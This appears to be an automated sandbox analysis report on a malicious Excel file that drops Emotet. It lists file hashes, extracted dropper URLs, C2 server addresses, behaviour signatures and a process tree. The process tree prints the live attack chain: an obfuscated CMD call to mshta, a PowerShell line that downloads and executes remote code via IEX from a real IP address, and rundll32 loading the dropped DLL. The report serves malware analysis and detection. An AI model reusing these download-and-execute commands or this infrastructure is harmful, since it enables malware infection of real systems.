Analysis

  • max time kernel
    60s
  • max time network
    50s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 01:01

General

  • Target

    2022-1-28-a1465b9e27030fa71b863fcbbe264405.xls

  • Size

    46KB

  • MD5

    a1465b9e27030fa71b863fcbbe264405

  • SHA1

    072615acb803b2f602222ba683b72ece4b1c5fec

  • SHA256

    0aeb1fed2a92309d35b4c1ee2f5a18ad9594fd5382f4ab9fe6fa431e9a426548

  • SHA512

    697e729b34013c3fc8956e9c8bb9e5799df007666f4bf288a878f35d3a4be597d51f71616096b2b363fa3a397a8a2662d1231403acedbdcfa88a2a0032c1edc6

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2022-1-28-a1465b9e27030fa71b863fcbbe264405.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3972
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:3924
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2376
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1400
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1896
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:3876
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lyupkftsqjvs\ggwxblau.exv",pWDVOZaNX
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:740
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Lyupkftsqjvs\ggwxblau.exv",DllRegisterServer
                    9⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1048
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 3924 -s 2276
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:988

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    06626264eaac835fedf9da1123f8d390

    SHA1

    a6ab8e057c18a48ee50c6ad7ae010d3b09e0c094

    SHA256

    297842eba5121f4492061ace94399b77c18763e46cd3f70dee9e12fa9c0e213d

    SHA512

    4af800b6497e58547bb1a2155f5b8ee5102c80265b1d43c19469e1470d5d57c6a302d13830b09ac0bae359f1bfab4dce9832e987982117c6feee61c9eaca0b33

  • \ProgramData\QWER.dll
    MD5

    06626264eaac835fedf9da1123f8d390

    SHA1

    a6ab8e057c18a48ee50c6ad7ae010d3b09e0c094

    SHA256

    297842eba5121f4492061ace94399b77c18763e46cd3f70dee9e12fa9c0e213d

    SHA512

    4af800b6497e58547bb1a2155f5b8ee5102c80265b1d43c19469e1470d5d57c6a302d13830b09ac0bae359f1bfab4dce9832e987982117c6feee61c9eaca0b33

  • \ProgramData\QWER.dll
    MD5

    06626264eaac835fedf9da1123f8d390

    SHA1

    a6ab8e057c18a48ee50c6ad7ae010d3b09e0c094

    SHA256

    297842eba5121f4492061ace94399b77c18763e46cd3f70dee9e12fa9c0e213d

    SHA512

    4af800b6497e58547bb1a2155f5b8ee5102c80265b1d43c19469e1470d5d57c6a302d13830b09ac0bae359f1bfab4dce9832e987982117c6feee61c9eaca0b33

  • memory/740-616-0x0000000002FD0000-0x0000000002FF5000-memory.dmp
    Filesize

    148KB

  • memory/1048-620-0x00000000000A0000-0x00000000000C5000-memory.dmp
    Filesize

    148KB

  • memory/1048-622-0x00000000002C0000-0x00000000002E5000-memory.dmp
    Filesize

    148KB

  • memory/1896-599-0x0000000000BD0000-0x0000000000BF5000-memory.dmp
    Filesize

    148KB

  • memory/2376-279-0x000002ABF0C70000-0x000002ABF0C92000-memory.dmp
    Filesize

    136KB

  • memory/2376-289-0x000002ABF0CD3000-0x000002ABF0CD5000-memory.dmp
    Filesize

    8KB

  • memory/2376-288-0x000002ABF0CD0000-0x000002ABF0CD2000-memory.dmp
    Filesize

    8KB

  • memory/2376-300-0x000002ABF1600000-0x000002ABF163C000-memory.dmp
    Filesize

    240KB

  • memory/2376-311-0x000002ABF16C0000-0x000002ABF1736000-memory.dmp
    Filesize

    472KB

  • memory/2376-545-0x000002ABF0CD6000-0x000002ABF0CD8000-memory.dmp
    Filesize

    8KB

  • memory/3876-606-0x0000000004C80000-0x0000000004CA5000-memory.dmp
    Filesize

    148KB

  • memory/3876-611-0x0000000004E40000-0x0000000004E65000-memory.dmp
    Filesize

    148KB

  • memory/3876-619-0x0000000005090000-0x00000000050B5000-memory.dmp
    Filesize

    148KB

  • memory/3876-615-0x0000000004F00000-0x0000000004F25000-memory.dmp
    Filesize

    148KB

  • memory/3876-603-0x0000000004780000-0x00000000047A5000-memory.dmp
    Filesize

    148KB

  • memory/3876-613-0x0000000004EA0000-0x0000000004EC5000-memory.dmp
    Filesize

    148KB

  • memory/3876-609-0x0000000004D60000-0x0000000004D85000-memory.dmp
    Filesize

    148KB

  • memory/3972-129-0x00007FFE8D940000-0x00007FFE8D950000-memory.dmp
    Filesize

    64KB

  • memory/3972-115-0x00007FFE91410000-0x00007FFE91420000-memory.dmp
    Filesize

    64KB

  • memory/3972-119-0x00007FFE91410000-0x00007FFE91420000-memory.dmp
    Filesize

    64KB

  • memory/3972-118-0x00007FFE91410000-0x00007FFE91420000-memory.dmp
    Filesize

    64KB

  • memory/3972-128-0x00007FFE8D940000-0x00007FFE8D950000-memory.dmp
    Filesize

    64KB

  • memory/3972-117-0x00007FFE91410000-0x00007FFE91420000-memory.dmp
    Filesize

    64KB

  • memory/3972-116-0x00007FFE91410000-0x00007FFE91420000-memory.dmp
    Filesize

    64KB